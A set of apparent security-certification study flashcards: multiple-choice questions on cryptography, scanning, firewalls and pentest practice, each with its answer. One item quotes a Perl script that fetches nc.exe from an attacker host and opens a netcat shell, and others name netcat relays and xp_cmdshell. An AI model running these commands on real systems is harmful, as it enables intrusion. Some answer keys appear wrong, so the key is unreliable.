Stuff
An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks below is likely to be used to crack the target file? A. Chosen plain-text attack B. Replay attack C. Timing attack D. Memory trade-off attack
A. Chosen plain-text attack
Which property ensures that a hash function will not produce the same hashed value for two different messages? A. Collision resistance B. Bit length C. Entropy D. Key strength
A. Collision resistance
Low humidity in a data center can cause which of the following problems? A. Static electricity B. Airborne contamination C. Corrosion D. Heat
A. Static electricity
Which of the following network attacks takes advantage of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack? A. Teardrop B. Ping of death C. SYN flood D. Smurf attack
A. Teardrop
Which of the following ensures that updates to policies, procedures, and configurations are made in a controlled and documented fashion? A. Penetration testing B. Change management C. Regulatory compliance D. Peer review
B. Change management
Which of the following is a hashing algorithm? A. ROT13 B. PGP C. MD5 D. DES
C. MD5
Which of the following is an example of IP spoofing? A. ARP poisoning B. SQL injections C. Man-in-the-middle D. Cross-site scripting
C. Man-in-the-middle
Which of the following scanning tools is specifically designed to find potential exploits in Microsoft Windows products? A. Core Impact B. Retina C. Microsoft Baseline Security Analyzer D. Microsoft Security Baseline Analyzer
C. Microsoft Baseline Security Analyzer
A company has five different subnets: 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0, and 192.168.5.0. How can NMAP be used to scan these adjacent Class C networks? A. NMAP -P 192.168.0.0/16 B. NMAP -P 192.168.1/17 C. NMAP -P 192.168.1-5 D. NMAP -P 192.168.1.0,2.0,3.0,4.0,5.0
C. NMAP -P 192.168.1-5
When using Wireshark to acquire packet capture on a network, which device would enable the capture of all traffic on the wire? A. Layer 3 switch B. Application firewall C. Network tap D. Network bridge
C. Network tap
Which United States legislation mandates that teh Chief Executive Officer (CEO) and the Chief Financial Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports? A. Federal Information Security Management Act (FISMA) B. Fair and Accurate Credit Transactions Act (FACTA) C. Sarbanes-Oxley Act (SOX) D. Gramm-Leach-Bliley Act (GLBA)
C. Sarbanes-Oxley Act (SOX)
In the OSI model, where does PPTP encryption take place? A. Network layer B. Application layer C. Data link layer D. Transport layer
C. Data link layer
A company firewall engineer has configured a new DMZ to allow public systems to be located away form the internal network. The engineer has three security zones set: Untrust (Internet) - (Remote network = 217.77.88.0/24) DMZ (DMZ) - (11.12.13.0/24) Trust (Intranet) - (192.168.0.0/24) The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ. Which rule would best fit this requirement? A. Permit 217.77.88.12 11.12.13.50 RDP 3389 B. Permit 217.77.88.0/24 11.12.13.50 RDP 3389 C. Permit 217.77.88.12 11.12.13.0/24 RDP 3389 D. Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389
A. Permit 217.77.88.12 11.12.13.50 RDP 3389
Which of the following is a component of a risk assessment? A. Physical security B. Administrative safeguards C. DMZ D. Logical interface
A. Physical security
The following is part of a log file taken from the machine on the network with the IP address of 192.168.1.106: Time: Mar 13 17:30:15 Port: 20 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP Time: Mar 13 17:30:17 Port: 21 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP Time: Mar 13 17:30:19 Port: 22 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP Time: Mar 13 17:30:21 Port: 23 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP Time: Mar 13 17:30:22 Port: 25 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP Time: Mar 13 17:30:23 Port: 80 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP Time: Mar 13 17:30:30 Port: 443 Source: 192.168.1.103 Destination: 192.168.1.106 Protocol: TCP What type of activity has been logged? A. Port scan targeting 192.168.1.106 B. Teardrop attack targeting 192.168.1.106 C. Port scan targeting 192.168.1.103 D. Denial of service attack targeting 192.168.1.103
A. Port scan targeting 192.168.1.106
A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of email. The integrity of the encrypted email is dependent on the security of which of the following? A. Private key B. Public key C. Email server certificate D. Modulus length
A. Private key
A company has publicly hosted web applications and an internal Intranet protected by a firewall. Which technique will help protect against enumeration? A. Remove A records for internal hosts B. Reject all invalid email received via SMTP C. Enable null session pipes D. Allow full DNS zone transfers
A. Remove A records for internal hosts
On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured? A. nessus & B. nessus -d C. nessus + D. nessus *s
A. nessus &
Which of the following is a symmetric cryptographic standard? A. 3DES B. RSA C. DSA D. PKI
A. 3DES
Which of the following descriptions is true about a static NAT? A. A static NAT uses a one-to-one mapping B. A static NAT uses a one-to-many mapping C. A static NAT uses a many-to-many mapping D. A static NAT uses a many-to-one mapping
A. A static NAT uses a one-to-one mapping
What is the main reason the use of a stored biometric is vulnerable to attack? A. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the biometric B. A stored biometric is no longer "something you are" and instead becomes "something you have" C. Authentication using a stored biometric compares a copy to a copy instead of the original to a copy D. The digital representation of the biometric might not be unique, even if the physical characteristic is unique
A. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the biometric
A large company intends to use Blackberry for corporate mobile phones and security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack? A. BBProxy B. Paros Proxy C. Blooover D. BBCrack
A. BBProxy
Advanced encryption standard is an algorithm used for which of the following? A. Bulk data encryption B. Data integrity C. Key discovery D. Key recovery
A. Bulk data encryption
Which of the following is a primary service of the U.S Computer Security Incident Response Team (CSIRT)? A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide B. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals traveling abroad C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multi-national corporations D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset
A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide
Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and that a certificate is still valid for specific operations? A. Certificate validation B. Certificate cryptography C. Certificate revocation D. Certificate issuance
A. Certificate validation
An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. The attacker can now use which cryptanalytic technique to attempt to discover the encryption key? A. Chosen ciphertext attack B. Plaintext attack C. Birthday attack D. Meet in the middle attack
A. Chosen ciphertext attack
Which of the statements concerning proxy firewalls is correct? A. Computers establish a connection with a proxy firewall which initiates a new network connection for the client B. Proxy firewalls block network packets from passing to and from a protected network C. Proxy firewalls increase the speed and functionality of a network D. Firewall proxy servers decentralize all activity for an application
A. Computers establish a connection with a proxy firewall which initiates a new network connection for the client
When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following? A. Continues to evaluate the packet until all rules are checked B. Drops the packet and moves on to the next one C. Blocks the connection with the source IP address in the packet D. Stops checking rules, sends an alert, and lets the packet continue
A. Continues to evaluate the packet until all rules are checked
A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using Metasploit? A. Create a route statement in the meterpreter B. Set the payload to propagate through the meterpreter C. Reconfigure the network settings in the meterpreter D. Issue the pivot exploit and set the meterpreter
A. Create a route statement in the meterpreter
When testing the company's web applications, a tester attempts to insert the following test script into the search area on the company's web site: Afterwards, when the tester presses the search button, a pop-up box appears on the screen with the text: "Testing Testing Testing". Which vulnerability has been detected in the web application? A. Cross-site scripting B. Buffer overflow C. Distributed denial of service D. Cross-site request forgery
A. Cross-site scripting
Smart cards use which protocol to transfer the certificate in a secure manner? A. Extensible Authentication Protocol (EAP) B. Point to Point Protocol (PPP) C. Point to Point Tunneling Protocol (PPTP) D. Layer 2 Tunneling Protocol (L2TP)
A. Extensible Authentication Protocol (EAP)
Which of the following techniques will identify if your computer files have been changed? A. Integrity checking hashes B. Permission sets C. Firewall alerts D. Network sniffing
A. Integrity checking hashes
The intrusion detection system at a software development company suddenly generates multiple alerts regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What should the security team do to determine which alerts to check first? A. Investigate based on the potential effect of the incident B. Investigate based on the service level agreements of the systems C. Investigate based on the maintenance schedule of the affected systems D. Investigate based on the order that the alerts arrived in
A. Investigate based on the potential effect of the incident
A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company's internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur? A. Mutual authentication B. SSL C. IPSec D. Static IP addresses
A. Mutual authentication
Which NAMP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection? A. NMAP -P0 -A -O -p1-65535 192.168.0/24 B. NMAP -PN -A -O -sS 192.168.0/24 C. NMAP -P0 -A -O -sT -p0-65535 192.168.0/16 D. NMAP -PN -A -O -sS -p 1-1024 192.168.0/8
A. NMAP -P0 -A -O -p1-65535 192.168.0/24
Which of the following resources does NMAP need to be used as a basic vulnerability scanner covering several vectors like SMB, HTTP and FTP? A. NMAP scripting engine B. Nessus scripting engine C. SAINT scripting engine D. Metasploit scripting engine
A. NMAP scripting engine
Which type of antenna is used in wireless communication? A. Omnidirectional B. Parabolic C. Bi-directional D. Uni-directional
A. Omnidirectional
A penetration tester was hired to perform a penetration test for a bank. The tester began searching for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online about the bank, watching what times the bank employees come into work and leave from work, searching the bank's job postings (paying special attention to IT related jobs), and visiting the local dumpster for the bank's corporate office. What phase of the penetration test is the tester currently in? A. Passive information gathering B. Vulnerability assessment C. Information reporting D. Active information gathering
A. Passive information gathering
Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit? A. They provide a repeatable framework B. Anyone can run the command line scripts C. They are subject to government regulation D. They are available at low cost
A. They provide a repeatable framework
How can telnet be used to fingerprint a web server? A. telnet webserverAddress 80 HEAD /HTTP/1.0 B. telnet webserverAddress 80 PUT /HTTP/1.0 C. telnet webserverAddress 80 PUT /HTTP/2.0 D. telnet webserverAddress 80 HEAD /HTTP/2.0
A. telnet webserverAddress 80 HEAD /HTTP/1.0
Which set of access control solutions implements two-factor authentication? A. USB token and pin B. Password and pin C. Fingerprint scanner and retina scanner D. Account and password
A. USB token and PIN
While performing data validation of web content, a security technician is require to restrict malicious input. Which of the following processes is an efficient way of restricting malicious input? A. Validate web content input for type, length, and range B. Validate web content input for extraneous queries C. Validate web content input for query strings D. Validate web content input with scanning tools
A. Validate web content input for type, length, and range
Which of the following is an application that requires a host application for replication? A. Virus B. Trojan C. Micro D. Worm
A. Virus
Which system consists of a publicly available set of databases that contain domain name registration contact information? A. WHOIS B. IANA C. IETF D. CAPTCHA
A. WHOIS
One way to defeat a multi-level security solution is to leak data via A. a covert channel B. asymmetric routing C. a bypass regulator D. steganography
A. a covert channel
From the two screenshots below, which of the following is occurring? A. 10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2 B. 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2 C. 10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2 D. 10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2
B. 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2
When conducting a penetration test, the tester determines that there is a firewall between the tester's machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the OSI model. Which type of firewall is the tester trying to traverse? A. Application-level firewall B. Circuit-level gateway firewall C. Stateful multilayer inspection firewall D. Packet filtering firewall
B. Circuit-level gateway firewall
What is the name of the international standard that establishes a baseline level of confidence in the security functionality of IT products by providing a set of requirements for evaluation? A. ISO 26029 B. Common Criteria C. Blue Book D. The Wassenaar Agreement
B. Common Criteria
Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker? A. SQLInjector B. DataThief C. Cain and Abel D. Netcat
B. DataThief
How do employers protect assets with security policies pertaining to employee surveillance activities? A. Employers use informal verbal communication channels to explain employee monitoring activities to employees. B. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities and consequences C. Employers promote monitoring activities of employees as long as the employees demonstrate trustworthiness D. Employers use network surveillance to monitor employee email traffic, network access, and to record employee keystrokes
B. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities and consequences
Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function? A. They must be dual-homed B. Fast processor to help with network traffic analysis C. Similar RAM requirements D. Fast network interface cards
B. Fast processor to help with network traffic analysis
ICMP ping and ping sweeps are used to check for active systems and to check A. the route that the ICMP ping took B. if ICMP ping traverses a firewall C. the number of hops an ICMP ping takes to reach a destination D. the location of the switchport in relation to the ICMP ping
B. if ICMP ping traverses a firewall
Which of the following describes a component of Public Key Interface (PKI) where a copy of a private key is stored to provide third-party access and to facilitate recovery operations? A. Directory B. Key escrow C. Recovery agent D. Key registry
B. Key escrow
Which of the following tools would be the best choice for achieving compliance with PCI Requirement 11? A. Truecrypt B. Nessus C. Sub7 D. Clamwin
B. Nessus
What is the outcome of the command "nc -l -p 2222 | nc 10.1.0.43 1234"? A. will listen on the 10.1.0.43 interface for 1234 seconds on port 2222 B. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234 C. Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43 D. Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222
B. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234
An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did not contain management or control packets in the submitted traces. Which of the following is the most likely reason for lack of management or control packets? A. The wireless card was not turned on B. On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode C. Certain operating systems and adapters do not collect the management or control packets D. The wrong network card drivers were in use by Wireshark
B. On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode
Which of the following is optimized for confidential communications, such as bidirectional voice and video? A. MD4 B. RC4 C. MD5 D. RC5
B. RC4
To send a PGP encrypted message, which piece of information from the recipient must the sender have before encrypting the message? A. Master encryption key B. Recipient's public key C. Recipient's private key D. Sender's public key
B. Recipient's public key
A hacker is attempting to use nslookup to query Domain Name Service (DNS). the hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records? A. Locate type = ns B. Set type = ns C. Request type = ns D. Transfer type = ns
B. Set type = ns
When creating a security program, which approach would be used if senior management is supporting and enforcing the security policy? A. A bottom-up approach B. A senior creation approach C. An IT assurance approach D. A top-down approach
D. A top-down approach
Which of the following identifies the three modes in which Snort can be configured to run? A. Sniffer, Network Intrusion Detection System, and Host Intrusion Detection System B. Sniffer, Packet Logger, and Network Intrusion Detection System C. Sniffer, Host Intrusion Prevention System, and Network Intrusion Prevention System D. Sniffer, Packet Logger, and Host Intrusion Prevention System
B. Sniffer, Packet Logger, and Network Intrusion Detection System
When utilizing technical assessment methods to assess the security posture of a network, which of the following techniques would be most effective in determining whether end-user security training would be beneficial? A. Vulnerability scanning B. Social engineering C. Application security testing D. Network sniffing
B. Social engineering
If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP? A. Hping B. TCP ping C. Traceroute D. Broadcast ping
B. TCP ping
A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operation System (OS) version installed. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at 2011-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not show: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:89 A. The host is likely a router. B. The host is likely a printer. C. The hos is likely a Linux machine. D. The host is likely a Windows machine.
B. The host is likely a printer.
Which protocol and port number might be needed in order to send log messages to a log analysis tool that resides behind a firewall? A. UDP 123 B. UDP 514 C. UDP 415 D. UDP 541
B. UDP 514
Which of the following is a common Service Oriented Architecture (SOA) vulnerability? A. Cross-site scripting B. XML denial of service issues C. VPath injection D. SQL injection
B. XML denial of service issues
Which command line switch would be used in NMAP to perform operating system detection? A. -OS B. -sO C. -O D. -sP
C. -O
A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use? A. -sU B. -sP C. -sS D. -sO
C. -sS
While checking the settings on the internet browser, a technician finds that the proxy server settings have been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet does the technician see? A. 10.10.10.10 B. 192.168.1.1 C. 127.0.0.1 D. 192.168.168.168
C. 127.0.0.1
An NMAP scan of a server shows port 25 is open. What risk could this pose? A. Open printer sharing B. Clear text authentication C. Active mail relay D. Web portal data leak
C. Active mail relay
Which of the following items is unique to the N-tier architecture method of designing software applications? A. Data security is tied into each layer and must be updated for all layers when any upgrade is performed B. Application layers can be written in C, ASP.NET, or Delphi without any performance loss C. Application layers can be separated, allowing each layer to be upgraded independently from other layers D. It is compatible with various databases including Access, Oracle, and SQL
C. Application layers can be separated, allowing each layer to be upgraded independently from other layers
How can a rootkit bypass Windows 7 operating system's kernel mode, code signing policy? A. Replacing patch system calls with its own version that hides the rootkit (attacker's) actions B. Performing common services for the application process and replacing real applications with fake ones C. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options D. Defeating the scanner from detecting any code change at the kernel
C. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options
Which of the following is a detective control? A. Smart card authentication B. Continuity of operations plan C. Audit trail D. Security policy
C. Audit trail
Which of the following items of a computer system will an anti-virus program scan for viruses? A. Password Protected Files B. Windows Process List C. Boot Sector D. Deleted Files
C. Boot Sector
Which of the following programming languages is most vulnerable to buffer overflow attacks? A. Python B. Java C. C++ D. Perl
C. C++
To reduce the attack surface of a system, administrators should perform which of the following processes to remove unnecessary software, services, and insecure configuration settings? A. Harvesting B. Windowing C. Hardening D. Stealthing
C. Hardening
Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them? A. Detective B. Reactive C. Passive D. Intuitive
C. Passive
Which of the following can the administrator do to verify that a tape backup can be recovered in its entirety? A. Restore a random file B. Read the first 512 bytes of the tape. C. Perform a full restore. D. Read the last 512 bytes of the tape.
C. Perform a full restore.
A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am. Which of the following programming languages would most likely be used? A. C# B. ASP.NET C. Python D. PHP
C. Python
An IT security engineering notices that the company's web server is currently being hacked. What should the engineer do next? A. Unplug the network connection on the company's web server B. Determine the origin of the attack and launch a counterattack C. Record as much information as possible from the attack D. Perform a system restart on the company's web server
C. Record as much information as possible from the attack
Which type of access control is use on a router or firewall to limit network activity? A. Mandatory B. Discretionary C. Rule-based D. Role-based
C. Rule-based
What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes the received response? A. Reflective B. Distributive C. Passive D. Active
D. Active
Which of the following processes evaluates the adherence of an organization to its stated security policy? A. Penetration testing B. Vulnerability assessment C. Security auditing D. Risk assessment
C. Security auditing
Which initial procedure should an ethical hacker perform after being brought into an organization? A. Assess what the organization is trying to protect B. Turn over deliverables C. Sign a formal contract with non-disclosure D. Begin security testing
C. Sign a formal contract with non-disclosure
A tester has been hired to do a web application security test. The tester notices that the site is dynamic and must make use of a back end database. In order for the tester to see if SQL injection is possible, what is the first character that the tester should use to attempt breaking a valid SQL request? A. Semicolon B. Exclamation mark C. Single quote D. Double quote
C. Single quote
A security consultant decides to use multiple layers of anti-virus defense, such as end user desktop anti-virus and E-mail gateway. This approach can be used to mitigate which kind of attack? A. Forensic attack B. Scanning attack C. Social engineering attack D. ARP spoofing attack
C. Social engineering attack
Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery (CSRF) vulnerable web application? A. The victim user must open the malicious link with a Firefox prior to version 3 B. The victim user must open the malicious link with an Internet Explorer prior to version 8 C. The session cookies generated by the application do not have the HttpOnly flag set D. The web application should not use random tokens
C. The session cookies generated by the application do not have the HttpOnly flag set
Which of the following lists are valid data-gathering activities associated with a risk assessment? A. Threat identification, response identification, mitigation identification B. System profile, vulnerability identification, security determination C. Threat identification, vulnerability identification, control analysis D. Attack profile, defense profile, loss profile
C. Threat identification, vulnerability identification, control analysis
A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement states that the penetration test be done from an external IP address with no prior knowledge of the internal IT systems. What kind of test is being performed? A. grey box B. white box C. black box D. red box
C. black box
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc funtions: system("perl msadc.pl - h $host -C \"echo open $your >testfile\""); system("perl msadc.pl - h $host -C \"echo $user>>testfile\""); system("perl msadc.pl - h $host -C \"echo $pass>>testfile\""); system("perl msadc.pl - h $host -C \"echo bin>>testfile\""); system("perl msadc.pl - h $host -C \"echo get nc.exe>>testfile\""); system("perl msadc.pl - h $host -C \"echo get hacked.html>>testfile\""); system("perl msadc.pl - h $host -C \"echo quit>>testfile\""); system("perl msadc.pl - h $host -C \"ftp \-s\:testfile\""); $o=; print "Opening...\n"; system("perl msadc.pl - h $host -C \"nc -l -p $port -e cmd.exe\""); Which exploit is indicated by this script? A. A buffer overflow exploit B. A denial of service exploit C. A SQL injection exploit D. A chained exploit
D. A chained exploit
The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services? A. Web application patches B. An extensible security framework named COBIT C. A security certification for hardened web applications D. A list of flaws and how to fix them
D. A list of flaws and how to fix them
An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting work on this job? A. Start by footprinting the network and mapping out a plan of attack B. Use social engineering techniques on the friend's employees to help identify areas that may be susceptible to attack C. Begin the reconnaissance phase with passive information gathering and then move into active information gathering D. Ask the employer for authorization to perform the work outside the company
D. Ask the employer for authorization to perform the work outside the company
When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations to perform external and internal penetration testing? A. At least once every three years or after any significant upgrade or modification B. At least once every two years and after any significant upgrade or modification C. At least twice a year or after any significant upgrade or modification D. At least once a year and after any significant upgrade or modification
D. At least once a year and after any significant upgrade or modification
Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode a packet capture and extract the voice conversations? A. Nikto B. Hping C. John the Ripper D. Cain
D. Cain
A hacker searches in Google for filetype:pcf to find Cisco VPN config files. Those files may contain connectivity passwords that can be decoded with which of the following? A. Cupp B. John the Ripper Pro C. Nessus D. Cain and Abel
D. Cain and Abel
Employees in a company are no longer able to access Internet web sites on their computers. The network administrator is able to successfully ping IP address of web servers on the Internet and is able to open web sites by using an IP address in place of the URL. The administrator runs the nslookup command for www.eccouncil.org and receives an error message stating there is no response from the server. What should the administrator do next? A. Configure the firewall to allow traffic on TCP port 53 B. Configure the firewall to allow traffic on TCP ports 80 and UDP port 443 C. Configure the firewall to allow traffic on TCP port 8080 D. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53
D. Configure the firewall to allow traffic on TCP ports 53 and UDP port 53
A computer science student needs to fill some information into a secured Adobe PDF job application that was received from a prospective employer. Instead of requesting a new document that allowed the forms to be completed, the student decides to write a script that pulls passwords from a list of commonly used passwords to try against the secured PDF until the correct password is found or the list is exhausted. Which cryptography attack is the student attempting? A. Session hijacking B. Man-in-the-middle attack C. Brute-force attack D. Dictionary attack
D. Dictionary attack
When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator's computer to update the router configuration. What type of an alert is this? A. True negative B. False negative C. True positive D. False positive
D. False positive
Passive reconnaissance involves collecting information through which of the following? A. Social engineering B. Network traffic sniffing C. Main in the middle attacks D. Publicly accessible sources
D. Publicly accessible sources
A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is worried that the company will go out of business and end up not paying. What actions should the CEH take? A. Threaten to publish the penetration test results if not paid B. Exploit some of the vulnerabilities found on the company webserver to deface it. C. Tell other customers of the financial problems with payments from this company D. Follow proper legal procedures against the company to request payment
D. Follow proper legal procedures against the company to request payment
During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system? A. Invoking the stored procedure cmd_shell to spawn a Windows command shell B. Invoking the stored procedure xp_shell to spawn a Windows command shell C. Using the Metasploit psexec module setting the SA/Admin credential D. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell
D. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell
What is the primary drawback to using advanced encryption standard (AES) algorithm with a 256 bit key to share sensitive data? A. Due to the key size, the time it will take to encrypt and decrypt the message hinders effective communication B. It has been proven to be a weak cipher; therefore, should not be trusted to protect sensitive data C. To get messaging programs to function with this algorithm requires complex configurations D. It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel than the message
D. It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel than the message
A circuit level gateway works at which of the following layers of the OSI Model? A. Layer 5 - Application B. Layer 2 - Data link C. Layer 3 - Internet Protocol D. Layer 4 - TCP
D. Layer 4 - TCP
Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following choices would be a common vulnerability that usually exposes them? A. SQL injection B. Cross-site scripting C. CRLF injection D. Missing patches
D. Missing patches
Which of the following describes the characteristics of a Boot Sector Virus? A. Overwrites the original MBR and only executes the new virus code B. Modifies directory table entries so that director entries point to the virus code instead of the actual program C. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR D. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
D. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
Which of the following tools will scan a network to perform vulnerability checks and compliance auditing? A. NMAP B. Metasploit C. BeEF D. Nessus
D. Nessus
How can rainbow tables be defeated? A. All uppercase character passwords B. Use of non-dictionary words C. Lockout accounts under brute force password cracking attempts D. Password salting
D. Password salting
A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend? A. Multipurpose Internet Mail Extension (MIME) B. IP Security (IPSEC) C. Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS) D. Pretty Good Privacy (PGP)
D. Pretty Good Privacy (PGP)
The following is a sample of output from a penetration tester's machine targeting a machine with the IP address of 192.168.1.106: [ATTEMPT] target 192.168.1.106 - login "root" - pass "a" 1 of 20 [ATTEMPT] target 192.168.1.106 - login "root" - pass "123" 2 of 20 [ATTEMPT] target 192.168.1.106 - login "testuser" - pass "a" 3 of 20 [ATTEMPT] target 192.168.1.106 - login "testuser" - pass "123" 4 of 20 [ATTEMPT] target 192.168.1.106 - login "admin" - pass "a" 5 of 20 [ATTEMPT] target 192.168.1.106 - login "admin" - pass "123" 6 of 20 [ATTEMPT] target 192.168.1.106 - login "" - pass "a" 7 of 20 [ATTEMPT] target 192.168.1.106 - login "" - pass "123" 8 of 20 What is most likely taking place? A. Port scan of 192.168.1.106 B. Ping sweep of the 192.168.1.106 network C. Denial of service attack on 192.168.1.106 D. Remote service brute force attempt
D. Remote service brute force attempt
A security analyst is performing an audit on the network to determine if there are any deviations from the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem installed. Which security policy must the security analyst check to see if dial-out modems are allowed? A. Firewall-management policy B. Acceptable-use policy C. Permissive policy D. Remote-access policy
D. Remote-access policy
Which type of scan is used on the eye to measure the layer of blood vessels? A. Iris scan B. Signature kinetics scan C. Facial recognition scan D. Retinal scan
D. Retinal scan
What is the best defense against privilege escalation vulnerability? A. Patch systems regularly and upgrade interactive login privileges at the system administrator level B. Run administrator and applications on least privileges and use a content registry fro tracking C. Review user roles and administrator privileges for maximum utilization of automation services D. Run services with least privileged accounts and implement multi-factor authentication and authorization
D. Run services with least privileged accounts and implement multi-factor authentication and authorization
At a Windows Server command prompt, which command could be used to list the running services? A. Sc query type= running B. Sc config C. Sc query \\servername D. Sc query
D. Sc query
Which of the following examples best represents a logical or technical control? A. Smoke and fire alarms B. Corporate security policy C. Heating and air conditioning D. Security tokens
D. Security tokens
A consultant is hired to do physical penetration testing at a large financial company. In the first day of his assessment, the consultant goes to the company's building dressed like an electrician and waits in the lobby for an employee to pass through the main access gate, then the consultant follows the employee behind to get into the restricted area. Which type of attack did the consultant perform? A. Shoulder surfing. B. Man trap C. Social engineering D. Tailgating
D. Tailgating
A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The company accepting bids wants proof of work so the consultant prints out several audits that have been performed. Which of the following is likely to occur as a result? A. The company accepting bids will hire the consultant because of the great work performed B. The company accepting bids will want the same type of format of testing C. The consultant will ask for money on the bid because of great work D. The consultant may expose vulnerabilities of other companies
D. The consultant may expose vulnerabilities of other companies
When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the following is true? A. The key is an RSA key used to encrypt the wireless data B. The key entered is based on the Diffie-Hellman method C. The key entered is a hash that is used to prove the integrity of the wireless data D. The key entered is a symmetric key used to encrypt the wireless data
D. The key entered is a symmetric key used to encrypt the wireless data
The fundamental difference between symmetric and asymmetric key cryptographic systems is that symmetric key cryptography uses which of the following? A. Multiple keys for non-repudiation of bulk data B. Bulk encryption for data transmission over fiber C. Different keys on both ends of the transport medium D. The same key on each end of the transmission medium
D. The same key on each end of the transmission medium
